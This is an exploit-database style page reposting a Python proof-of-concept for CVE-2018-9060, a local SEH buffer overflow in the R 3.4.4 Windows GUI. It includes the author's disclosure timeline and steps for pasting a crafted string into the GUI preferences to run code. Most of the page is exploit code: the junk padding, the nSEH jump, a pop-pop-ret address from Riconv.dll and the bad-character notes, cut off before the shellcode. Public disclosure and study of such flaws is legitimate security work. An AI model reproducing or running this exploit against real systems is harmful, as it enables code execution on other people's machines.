Rgui 3.4.4 local buffer overflow Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2018-04-24 |
Type : local |
Platform : windows
This exploit / vulnerability Rgui 3.4.4 local buffer overflow is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#!/usr/bin/python
#
# Exploit Author: bzyo
# CVE: CVE-2018-9060
# Twitter: @bzyo_
# Exploit Title: R 3.4.4 - Local Buffer Overflow
# Date: 03-27-2018
# Vulnerable Software: R 3.4.4
# Vendor Homepage: https://www.r-project.org/
# Version: 3.4.4
# Software Link: https://cloud.r-project.org/bin/windows/
# Tested On: Windows 7 x86
#
# Timeline:
# 03-27-18: Emailed author, no response
# 04-03-18: Emailed author, no response
# 04-10-18: Emailed author, no response
# 04-23-18: New version released; Submitted public disclosure
#
# lots of bad chars, use alpha_mixed
# badchars \x00\x0a\x0d\x0e and \x80 through \xbf
#
#
# PoC:
# 1. generate r344.txt, copy contents to clipboard
# 2. open app, select Edit, select 'GUI preferences'
# 3. paste r344.txt contents into 'Language for menus and messages'
# 4. select OK
# 5. pop calc
#
filename="r344.txt"
junk = "A"*900
#jump 6
nseh = "\xeb\x06\xcc\xcc"
#0x643c17af : pop esi # pop edi # ret | {PAGE_EXECUTE_READ} [Riconv.dll]
seh = "\xaf\x17\x3c\x64"